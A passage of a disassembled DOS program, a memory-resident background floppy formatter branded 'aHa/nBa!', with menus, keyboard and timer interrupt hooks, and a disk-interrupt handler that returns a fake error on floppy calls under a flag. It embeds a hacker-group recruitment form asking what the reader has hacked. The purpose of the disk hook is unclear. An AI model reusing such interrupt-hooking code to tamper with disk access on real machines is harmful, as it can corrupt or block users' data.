0DFh + db 0DFh,0DFh,0AFh +data_44 db 9 + db 0Fh, 09h, 12h +data_45 db 2Ah + db 1Bh, 2Ah, 1Ah +data_46 db 50h + db 54h, 50h, 6Ch +data_47 db 0FDh + db 0F9h,0F9h,0F0h +data_48 db 70h + db 0 + db 0E0h, 00h + +locloop_2: + jo loc_3 ; Jump if overflow=1 +loc_3: + loopnz $+2 ; Loop if zf=0, cx>0 + + rol byte ptr [bp+si],1 ; Rotate + db 60h, 09h,0A0h, 05h, 40h, 0Bh +data_50 db 2 + db 0, 7, 0, 3, 0, 9 + db 0 +data_51 db 62h + db 01h, 43h, 09h,0C9h, 02h, 1Fh + db 0Bh +data_52 db 6 + db 1, 4, 3 +data_53 db 0 +data_54 dw 0 +data_55 db 0 +data_56 db 0 +data_57 db 2Ah +data_58 db 50h +data_59 db 0 +data_60 db 0, 0 +data_61 dw 0 +data_62 db 0 +data_63 db 0 +data_64 db 0 +data_65 db 0 +data_66 db 0 +data_67 dw 0 +data_68 dw 0 +data_69 db 0 +data_70 db 0 +data_71 db 0 +data_72 db 0 +data_73 db 0 +data_74 db 0 +data_75 db 0 +data_76 db 0 +data_77 db 0 +data_78 db 0 +data_79 db 0 +data_80 db 0 +data_81 dw 130Dh +data_82 dw 0 +data_84 dw 0 +data_85 dw 0 +data_86 dw 0 +data_87 dw 0 +data_88 dw 0 +data_89 dw 0 +data_90 dw 0 +data_91 dw 0 +data_92 dw 0 +data_93 dw 0 +data_94 db 0 +data_95 db 0 +data_96 db 0Bh +data_97 db 0 +data_98 db 0, 0 +data_99 db 0 +data_100 dw 0 +data_101 db 0 +data_102 db 0 +data_103 db 0 +data_104 db 0 +data_105 dw 0 +data_106 dw 0 +data_107 db 0 +data_108 db 0 +data_109 db 0 +data_110 db 6 +data_111 db 0A0h +data_112 db 0 +data_113 db 0 + db 11 dup (0) +data_115 db 0 + db 9 dup (0) + +ahadisk endp + +; +; SUBROUTINE +; + +sub_2 proc near + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+di],al + add [bx],cl + add [bx+di],al + add [bp+si],cl + add [si+0],ah +;* call sub_5 ;* + db 0E8h, 03h, 10h + daa ; Decimal adjust + mov al,byte ptr ds:[4086h] + inc dx + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + ja $+7 ; Jump if above + add [bx+si],al + add [bx+si],al + pop dx + xor ax,355Ah + pop dx + xor ax,577h + add [bx+si],al + +; External Entry into Subroutine + +sub_3: + add [bx+si],al + add [bx+si],al + add [bx+si],al + pop dx + xor ax,0 + add [bx+si],al + add [bx+si],al + pop dx + xor ax,0 + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + pop dx + xor ax,577h + pop dx + xor ax,0 + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add bh,dh +;* pop cs ; Dangerous 8088 only + db 0Fh +;* jo loc_4 ;*Jump if overflow=1 + db 70h,0FFh + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [bx+si],al + add [di+6Eh],al + jz loc_5 ; Jump if zero + jc $+22h ; Jump if carry Set + inc sp + jc $+6Bh ; Jump if carry Set + jbe loc_6 ; Jump if below or = + and [si+6Fh],dl + and [bp+si+65h],al + and [bp+6Fh],al + jc $+6Fh ; Jump if carry Set + db 61h, 74h, 20h, 3Fh, 20h, 5Bh + db 'A' + db 5Dh, 00h + db 'Enter Drive Type ? (0 - 360K, 1 ' + db '- 1.2M) [0]' + db 0 + db 'Enter Drive Type ? (0 - 720K,' +loc_5: + and [bx+di],dh + and [di],ch + and [bx+di],dh +loc_6: + db '.44M) [0]' + db 0 + db 'Number Of Diskette To Be Format ' + db '(1-11) [' +data_182 dw 3131h + db 5Dh, 20h, 3Fh, 20h, 00h + db 'Insert New Diskette Into Drive ' +data_183 db 41h + db 0 + db 'Press ENTER To Start Format Or E' + db 'SC To Abort' + db 0 + db 'Can', 27h, 't Release From Memor' + db 'y, Interrupt Vector Address Been' + db ' Changed' + db 0 + db 'Press Any Key To Return To Main ' + db 'Menu' + db 0 + db 'No Format Report !' + db 00h, 00h, 00h, 00h, 00h, 2Dh + db 00h, 00h, 00h, 00h, 00h + db 43h, 70h +data_184 db 'HpApNpGpEpEpRpRpOpRp!pFpIpNpIpSp' + db 'Hp p p', 0 + db 'p', 0 + db 'p p pDisk Not Ready !', 0 + db 'Disk Write Protected !', 0 + db 'Seek Error !', 0 + db 'Abort or Retry ?', 0 + db 'Track 0 Bad, Diskette Unusable !' + db 0 + db 'Program Interrupted !', 0 + db 'Ready Printer, Press ENTER When ' + db 'Ready !', 0 + db 'Printing ....', 0 + db 'I/O Error !', 0 + db 'Printer Not Ready !', 0 + db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 13h, 20h,0ADh + db 'aHa/nBa!Mem Resident Format ' + db 1, 3 + db ' Version 6.9' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0CCh, 01h + db 4Eh,0CDh,0B9h,0BAh, 01h, 4Eh + db 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h + db 4Eh, 20h + db 0BAh,0C8h, 01h, 4Eh,0CDh,0BCh + db 01h, 87h,0D0h, 1Fh,0C9h, 01h + db 4Eh,0CDh,0BBh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 13h, 20h + db 0ADh + db 'aHa/nBa!Mem Resident Format ' + db 1, 3 + db ' Version 6.9' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0CCh, 01h + db 4Eh,0CDh,0B9h,0BAh, 01h, 1Ch + db 20h + db 0DAh, 01h, 15h,0C4h,0BFh, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0B3h + db ' Print Out ' + db 0ADh + db 'aHa/nBa! ' + db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh + db 01h, 1Ch, 20h,0C0h, 01h, 15h + db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh + db 0BAh, 01h, 1Ch, 20h,0DAh, 01h + db 15h,0C4h + db 0BFh, 01h, 1Bh, 20h,0BAh,0BAh + db 01h, 1Ch, 20h,0B3h, 01h, 04h + db ' Start format' + db 01h, 05h, 20h,0B3h, 01h, 1Bh + db 20h,0BAh,0BAh, 01h, 1Ch, 20h + db 0C0h, 01h, 15h,0C4h,0D9h, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0DAh, 01h, 15h,0C4h,0BFh + db 01h, 1Bh, 20h,0BAh,0BAh, 01h + db 1Ch, 20h,0B3h, 01h, 04h + db ' Format report' + db 01h, 04h, 20h,0B3h, 01h, 1Bh + db 20h,0BAh,0BAh, 01h, 1Ch, 20h + db 0C0h, 01h, 15h,0C4h,0D9h, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0DAh, 01h, 15h,0C4h,0BFh + db 01h, 1Bh, 20h,0BAh,0BAh, 01h + db 1Ch, 20h,0B3h + db ' Track display o' +data_187 dw 206Eh + db 20h, 20h,0B3h, 01h, 1Bh, 20h + db 0BAh,0BAh, 01h, 1Ch, 20h,0C0h + db 01h, 15h,0C4h,0D9h, 01h, 1Bh + db 20h,0BAh,0BAh, 01h, 1Ch, 20h + db 0DAh, 01h, 15h,0C4h,0BFh, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0B3h + db ' Release from memory ' + db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh + db 01h, 1Ch, 20h,0C0h, 01h, 15h + db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh + db 0BAh, 01h, 1Ch, 20h,0DAh, 01h + db 15h,0C4h,0BFh, 01h, 1Bh, 20h + db 0BAh,0BAh, 01h, 1Ch, 20h,0B3h + db 01h, 09h, 20h, 45h, 78h, 69h + db 74h, 01h, 08h, 20h,0B3h, 01h + db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch + db 20h,0C0h, 01h, 15h,0C4h,0D9h + db 01h, 1Bh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh + db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh + db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 13h, 20h,0ADh + db 'aHa/nBa!Mem Resident Format ' + db 1, 3 + db ' Version 6.9' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0CCh, 01h + db 4Eh + db 0CDh,0B9h,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 4Eh, 20h + db 0BAh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 4Eh, 20h,0BAh,0CCh, 01h + db 17h + db 0CDh,0D1h, 01h, 0Fh,0CDh,0D1h + db 01h, 10h,0CDh,0D1h, 01h, 15h + db 0CDh,0B9h,0BAh, 01h + db 3 + db ' Drive To Be Format ' + db 0B3h, 01h, 03h + db ' Drive Type ' + db 0B3h + db ' Diskette No. ' + db 0B3h + db ' Total Diskette(s) ' + db 0BAh,0C7h, 01h, 17h,0C4h,0C5h + db 01h, 0Fh,0C4h,0C5h, 01h, 10h + db 0C4h,0C5h, 01h, 15h,0C4h,0B6h + db 0BAh, 01h, 0Bh + db 20h +data_188 db 41h + db 01h, 0Bh, 20h,0B3h, 01h, 05h + db 20h +data_189 db 31h + db 2Eh, 34h, 34h, 20h, 4Dh, 01h + db 04h, 20h,0B3h, 01h, 06h + db 20h +data_190 dw 3120h + db 01h, 08h, 20h,0B3h, 01h + db 09h, 20h +data_191 dw 3131h + db 1 + db 0Ah, 20h,0BAh,0C8h, 01h + db 17h,0CDh,0CFh, 01h, 0Fh,0CDh + db 0CFh, 01h, 10h,0CDh,0CFh, 01h + db 15h,0CDh,0BCh, 01h, 87h,0D0h + db 1Fh,0C9h, 01h, 4Eh,0CDh,0BBh + db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh + db 01h, 13h + db ' Background Diskette Formatter S' + db 'tatus Report' + db 01h, 10h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh + db 20h,0BAh,0CCh, 01h, 0Ch,0CDh + db 0D1h + db 01h, 15h,0CDh,0D1h, 01h, 11h + db 0CDh + db 0D1h, 01h, 19h,0CDh,0B9h,0BAh + db ' Diskette ' + db 0B3h, 01h, 07h, 20h, 56h, 6Fh + db 6Ch, 75h, 6Dh, 65h, 01h, 08h + db 20h,0B3h, 01h, 05h, 20h, 4Eh + db 6Fh, 2Eh, 20h, 4Fh, 66h, 01h + db 06h, 20h,0B3h, 01h, 04h + db ' Total Disk Space' + db 01h, 05h, 20h,0BAh,0BAh, 01h + db 05h, 20h, 4Eh, 6Fh, 2Eh, 01h + db 04h, 20h,0B3h, 01h, 04h + db ' Serial Number' + db 01h, 04h, 20h,0B3h + db ' Bad Cluster(s) ' + db 0B3h, 01h + db 8, ' In Bytes' + db 01h, 09h, 20h,0BAh,0C7h, 01h + db 0Ch,0C4h,0C5h, 01h, 15h,0C4h + db 0C5h, 01h, 11h,0C4h,0C5h, 01h + db 19h,0C4h,0B6h + db 0BAh, 01h, 0Ch, 20h + db 0B3h, 01h, 15h + db 20h,0B3h, 01h, 11h, 20h,0B3h + db 01h, 19h, 20h,0BAh,0BAh, 01h + db 0Ch, 20h,0B3h, 01h, 15h, 20h + db 0B3h, 01h, 11h, 20h,0B3h, 01h + db 19h, 20h,0BAh,0BAh, 01h, 0Ch + db 20h,0B3h, 01h, 15h, 20h,0B3h + db 01h, 11h, 20h,0B3h, 01h, 19h + db 20h,0BAh,0BAh, 01h, 0Ch, 20h + db 0B3h, 01h, 15h, 20h,0B3h, 01h + db 11h + db 20h + db 0B3h, 01h, 19h, 20h,0BAh,0BAh + db 01h, 0Ch, 20h,0B3h, 01h, 15h + db 20h,0B3h, 01h, 11h, 20h,0B3h + db 01h, 19h, 20h,0BAh,0BAh, 01h + db 0Ch, 20h,0B3h, 01h, 15h, 20h + db 0B3h, 01h, 11h, 20h,0B3h, 01h + db 19h, 20h,0BAh,0BAh, 01h, 0Ch + db 20h,0B3h, 01h, 15h, 20h,0B3h + db 01h, 11h, 20h,0B3h, 01h, 19h + db 20h,0BAh,0BAh, 01h, 0Ch, 20h + db 0B3h, 01h, 15h, 20h,0B3h, 01h + db 11h, 20h,0B3h, 01h, 19h, 20h + db 0BAh,0BAh, 01h, 0Ch, 20h,0B3h + db 01h, 15h, 20h,0B3h, 01h, 11h + db 20h,0B3h, 01h, 19h, 20h,0BAh + db 0BAh, 01h, 0Ch, 20h,0B3h, 01h + db 15h, 20h,0B3h, 01h, 11h, 20h + db 0B3h, 01h, 19h, 20h,0BAh,0BAh + db 01h, 0Ch, 20h,0B3h, 01h, 15h + db 20h,0B3h, 01h, 11h, 20h,0B3h + db 01h, 19h, 20h,0BAh,0CCh, 01h + db 0Ch,0CDh,0CFh, 01h, 15h,0CDh + db 0CFh, 01h, 11h,0CDh,0CFh, 01h + db 19h,0CDh,0B9h,0BAh, 01h, 4Eh + db 20h,0BAh,0BAh, 01h, 15h + db 20h, 50h + db 'ress Any Key To Return To Main M' + db 'enu' + db 01h, 15h, 20h,0BAh,0BAh, 01h + db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh + db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh + db 0Dh, 0Ah, 0Dh, 0Ah, 20h + db 9 dup (20h) + db 0ADh + db 'aHa/nBa! Application Form! ' + db ' ', 0Dh + db 0Ah, 'What file is this?', 0Dh, 0Ah + db ' Where Did ' + db 'you get it from?', 0Dh, 0Ah, ' ' + db ' Handle:', 0Dh, 0Ah + db ' Phone #:', 0Dh, 0Ah, ' ' + db ' ', 0Dh, 0Ah, ' ' + db ' List 3 boards whe' + db 're you could be reached at: ', 0Dh + db 0Ah, 0Dh, 0Ah, ' ' + db ' Can y' + db 'ou HaCK?', 0Dh, 0Ah, ' ' + db ' List a fe' + db 'w thigs you', 27h, 've hacked:', 0Dh + db 0Ah, 0Dh, 0Ah, ' ' + db ' Ok! Send MoneY, pft,' + db ' and this letter to:', 0Dh, 0Ah, ' ' + db ' Psycho', 0Dh + db 0Ah, ' 1340 W Irving', 0Dh + db 0Ah, ' #229', 0Dh, 0Ah, ' ' + db ' Chicago, IL', 0Dh, 0Ah, ' 60' + db '613', 0Dh, 0Ah, ' ' + db ' Ok! No' + db 'w, write about yourself: ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ' + db ' ', 0Ch, 0 + db '.' + db 80h, 3Eh, 2Dh, 02h, 00h, 74h + db 08h, 2Eh,0FEh, 0Eh, 2Dh, 02h + db 0EBh, 09h, 90h + db 2Eh,0F6h, 06h, 2Eh, 02h, 80h + db 75h, 05h +loc_32: + jmp dword ptr cs:[195h] +loc_33: + mov word ptr cs:[1EAh],ax + mov al,0Bh + out 20h,al ; port 20h, 8259-1 int command + jmp short $+2 ; delay for I/O + in al,20h ; port 20h, 8259-1 int IRR/ISR + and al,0FEh + mov ax,word ptr cs:[1EAh] + jz loc_34 ; Jump if zero + jmp short loc_32 +loc_34: + mov word ptr cs:[1FCh],ax + mov word ptr cs:[1FEh],bx + mov word ptr cs:[208h],sp + mov word ptr cs:[20Eh],ss + mov word ptr cs:[20Ch],ds + mov word ptr cs:[210h],es + mov word ptr cs:[20Ah],bp + mov word ptr cs:[204h],si + mov word ptr cs:[206h],di + mov word ptr cs:[200h],cx + mov word ptr cs:[202h],dx + mov ds,word ptr cs:[1E2h] + mov ss,word ptr ds:[1DAh] + mov sp,word ptr ds:[1DCh] + mov es,word ptr ds:[1E4h] + mov bp,word ptr ds:[1E0h] + mov si,word ptr ds:[1D8h] + mov di,word ptr ds:[1DEh] + mov ax,word ptr ds:[1D0h] + mov bx,word ptr ds:[1D2h] + mov cx,word ptr ds:[1D4h] + mov dx,word ptr ds:[1D6h] + jmp dword ptr cs:[195h] + mov word ptr cs:[1F8h],ds + mov word ptr cs:[1F6h],ax + mov word ptr cs:[1FAh],bx + mov ds,cs:data_25 + mov bx,keybd_flags_1_ + mov ah,[bx] + and ah,0Fh + cmp ah,0Bh + jne loc_36 ; Jump if not equal + test byte ptr cs:[22Eh],0C0h + jz loc_35 ; Jump if zero + test byte ptr cs:[22Eh],40h ; '@' + jz loc_36 ; Jump if zero + or byte ptr cs:[22Eh],20h ; ' ' + jmp short loc_36 + db 90h +loc_35: + or byte ptr cs:[22Eh],80h +loc_36: + mov ax,word ptr cs:[1F6h] + mov ds,word ptr cs:[1F8h] + mov bx,word ptr cs:[1FAh] + jmp dword ptr cs:[199h] + db 2Eh, 80h, 3Eh, 2Fh, 02h, 00h + db 74h, 0Dh, 2Eh,0C6h, 06h, 2Fh + db 02h, 00h, 50h,0B0h, 66h,0E6h + db 20h, 58h,0CFh +loc_37: + jmp dword ptr cs:[19Dh] + test dl,80h + jnz loc_38 ; Jump if not zero + test byte ptr cs:[22Eh],40h ; '@' + jz loc_38 ; Jump if zero + mov word ptr cs:[1EAh],ax + pop ax + pop ax + pop ax + or ax,1 + push ax + sub sp,4 + mov ax,word ptr cs:[1EAh] + mov ah,80h + iret ; Interrupt return +sub_2 endp + + +; +; SUBROUTINE +; + +sub_6 proc near +loc_38: + jmp dword ptr cs:[1A1h] + mov byte ptr ds:[22Eh],40h ; '@' + call sub_28 + jnc loc_40 ; Jump if carry=0 + clc ; Clear carry flag +loc_39: + call sub_11 + jmp loc_121 +loc_40: + mov ds,data_25 + test byte ptr ds:dsk_motor_stat_,0Fh + push cs + pop ds + jnz loc_39 ; Jump if not zero + call sub_22 + call sub_23 +loc_41: + mov ax,55Ch + mov cs:data_93,ax + call sub_21 + mov data_112,70h ; 'p' + call sub_27 + call sub_13 +loc_42: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_48 ; Jump if equal + cmp al,0Dh + je loc_49 ; Jump if equal + cmp ah,48h ; 'H' + je loc_50 ; Jump if equal + cmp ah,50h ; 'P' + je loc_53 ; Jump if equal + and al,0DFh + cmp al,50h ; 'P' + je loc_43 ; Jump if equal + cmp al,52h ; 'R' + je loc_47 ; Jump if equal + cmp al,45h ; 'E' + je loc_48 ; Jump if equal + cmp al,53h ; 'S' + je loc_44 ; Jump if equal + cmp al,46h ; 'F' + je loc_45 ; Jump if equal + cmp al,54h ; 'T' + je loc_46 ; Jump if equal + call sub_11 + jmp short loc_42 +loc_43: + jmp loc_137 +loc_44: + jmp short loc_55 + db 90h +loc_45: + jmp loc_145 +loc_46: + jmp loc_149 +loc_47: + jmp loc_151 +loc_48: + jmp loc_154 +loc_49: + mov al,3 + mul data_107 ; ax = data * al + add ax,offset loc_43 + jmp ax ;*Register jump +loc_50: + mov data_112,1Fh + call sub_27 + cmp data_107,0 + je loc_52 ; Jump if equal + dec data_107 + sub data_110,3 +loc_51: + mov data_112,70h ; 'p' + call sub_27 + jmp short loc_42 +loc_52: + mov data_107,5 + mov data_110,15h + jmp short loc_51 +loc_53: + mov data_112,1Fh + call sub_27 + cmp data_107,5 + je loc_54 ; Jump if equal + inc data_107 + add data_110,3 + jmp short loc_51 +loc_54: + mov data_107,0 + mov data_110,6 + jmp short loc_51 +loc_55: + call sub_19 + mov data_190,3120h + cmp data_28,1 + jne loc_56 ; Jump if not equal + mov data_29,0 + jmp short loc_60 + db 90h +loc_56: + mov dh,0Dh + mov dl,18h + mov si,232h + call sub_14 + call sub_13 + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + jne loc_57 ; Jump if not equal + jmp loc_41 +loc_57: + cmp al,0Dh + je loc_60 ; Jump if equal + and al,0DFh + sub al,41h ; 'A' + jge loc_59 ; Jump if > or = +loc_58: + call sub_11 + jmp short loc_55 +loc_59: + cmp al,data_28 + jge loc_58 ; Jump if > or = + mov data_29,al + add al,41h ; 'A' + mov byte ptr ds:[24Eh],al ; ('A') + mov data_183,al + mov data_188,al +loc_60: + call sub_19 + call sub_37 + test byte ptr [bx],1 + jz loc_63 ; Jump if zero + mov dh,10h + mov dl,14h + test byte ptr [bx],2 + jnz loc_61 ; Jump if not zero + mov si,251h + jmp short loc_62 + db 90h +loc_61: + mov si,27Eh +loc_62: + call sub_14 + call sub_13 + mov al,31h ; '1' + mov data_102,al + mov al,[si-3] + mov data_103,al + mov data_89,1331h + call sub_16 + and byte ptr [si-3],0FEh + or [si-3],al + xor al,1 + xor data_31,ax +loc_63: + mov ax,data_31 + call sub_39 +loc_64: + call sub_20 + mov dh,0Bh + mov dl,14h + mov si,2ABh + call sub_14 + call sub_38 + cmp data_101,0 + je loc_69 ; Jump if equal + mov ax,word ptr ds:[137h] + mov bx,ax + cmp data_101,1 + jne loc_65 ; Jump if not equal + xchg bh,bl + xor bl,bl ; Zero register + sub al,30h ; '0' + jmp short loc_67 + db 90h +loc_65: + sub al,27h ; ''' + cmp al,0Ah + jg loc_64 ; Jump if > + jz loc_66 ; Jump if zero + xor al,al ; Zero register +loc_66: + sub ah,30h ; '0' + add al,ah + cmp al,0Bh + jg loc_64 ; Jump if > +loc_67: + cmp al,0 + je loc_64 ; Jump if equal + mov data_96,al + or bl,20h ; ' ' + cmp bl,30h ; '0' + jne loc_68 ; Jump if not equal + mov bl,20h ; ' ' +loc_68: + mov data_191,bx + mov data_182,bx +loc_69: + mov data_100,0F5h + mov data_95,0 + mov data_99,0 + call sub_20 + mov dh,0Ah + mov dl,18h + mov si,2DAh + call sub_14 + mov dh,0Ch + mov dl,13h + mov si,2FBh + call sub_14 + call sub_13 +loc_70: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,0Dh + je loc_72 ; Jump if equal + cmp al,1Bh + jne loc_71 ; Jump if not equal + jmp loc_41 +loc_71: + call sub_11 + jmp short loc_70 +loc_72: + mov data_82,1525h + cli ; Disable interrupts + pushf ; Push flags + push cs + mov ax,201h + mov bx,28E9h + mov cx,1 + mov dl,data_29 + xor dh,dh ; Zero register + call sub_6 + jnc loc_78 ; Jump if carry=0 + clc ; Clear carry flag + test ah,80h + jz loc_78 ; Jump if zero + call sub_11 + xor cx,cx ; Zero register + +locloop_73: + loop locloop_73 ; Loop if cx > 0 + + call sub_11 + call sub_56 + call sub_20 + mov dh,0Ah + mov dl,20h ; ' ' + mov si,3DAh + call sub_14 +loc_74: + mov dh,0Eh + mov dl,20h ; ' ' + mov si,40Fh + call sub_14 + call sub_13 +loc_75: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_77 ; Jump if equal + and al,0DFh + cmp al,52h ; 'R' + jne loc_76 ; Jump if not equal + jmp data_82 +loc_76: + cmp al,41h ; 'A' + je loc_77 ; Jump if equal + call sub_11 + jmp short loc_75 +loc_77: + jmp loc_135 +loc_78: + call sub_24 + call sub_61 + or byte ptr ds:[22Eh],80h + cli ; Disable interrupts + call sub_7 +loc_79: + call sub_52 + call sub_60 + mov data_82,1596h + call sub_64 + test data_73,0C0h + jz loc_80 ; Jump if zero + call sub_64 + test data_73,0C0h + jz loc_80 ; Jump if zero + jmp loc_123 +loc_80: + call sub_74 + test data_73,0C0h + jz loc_81 ; Jump if zero + jmp short loc_83 + db 90h +loc_81: + cmp byte ptr ds:[230h],0 + je loc_82 ; Jump if equal + mov ax,word ptr ds:[243Dh] + cmp data_218,ax + jne loc_82 ; Jump if not equal + mov ax,word ptr ds:[243Fh] + cmp data_219,ax + jne loc_82 ; Jump if not equal + jmp loc_117 +loc_82: + cmp byte ptr data_214,0EBh + jne loc_83 ; Jump if not equal + cmp data_217,200h + jne loc_83 ; Jump if not equal + mov data_84,1626h + jmp short loc_84 + db 90h +loc_83: + mov data_84,1623h +loc_84: + call sub_77 + jnc loc_85 ; Jump if carry=0 + jmp loc_123 +loc_85: + test al,40h ; '@' + jz loc_87 ; Jump if zero +loc_86: + mov data_62,3 + jmp loc_125 +loc_87: + mov byte ptr ds:[230h],0 +loc_88: + mov data_82,161Fh +loc_89: + jmp data_84 + call sub_78 + mov data_68,28E9h + mov ax,word ptr data_60 + mov data_67,ax + mov data_69,42h ; 'B' + mov data_70,0E6h + mov data_85,27F1h + call sub_75 + test data_73,0C0h + jz loc_95 ; Jump if zero + test data_74,20h ; ' ' + jz loc_90 ; Jump if zero + cmp data_94,2 + je loc_93 ; Jump if equal + inc data_94 + jmp short loc_91 + db 90h +loc_90: + mov data_94,0 +loc_91: + call sub_65 + test data_73,0C0h + jz loc_92 ; Jump if zero + jmp loc_123 +loc_92: + mov data_84,1623h + jmp short loc_88 +loc_93: + mov data_94,0 + cmp data_65,0 + jne loc_94 ; Jump if not equal + jmp loc_105 +loc_94: + call sub_51 +loc_95: + cmp data_64,0 + jne loc_97 ; Jump if not equal + mov data_64,1 +loc_96: + jmp short loc_89 +loc_97: + call sub_9 + mov data_82,161Fh + mov data_64,0 + inc data_65 + inc data_63 + cmp data_31,0 + jne loc_98 ; Jump if not equal + inc data_63 +loc_98: + call sub_46 + cmp data_63,50h ; 'P' + jge loc_99 ; Jump if > or = + call sub_63 + test data_73,0C0h + jz loc_96 ; Jump if zero + call sub_65 + test data_73,0C0h + jz loc_96 ; Jump if zero + jmp short loc_100 + db 90h +loc_99: + mov data_65,0 + mov data_63,0 + mov data_66,1 + mov data_64,0 + mov data_59,0 + call sub_63 + test data_73,0C0h + jz loc_101 ; Jump if zero + call sub_65 + test data_73,0C0h + jz loc_101 ; Jump if zero +loc_100: + mov data_62,40h ; '@' + jmp loc_125 +loc_101: + mov data_82,1712h + call sub_78 + cmp data_64,1 + je loc_102 ; Jump if equal + mov data_64,1 + jmp short loc_101 +loc_102: + call sub_52 + mov ds,data_25 + mov ax,word ptr 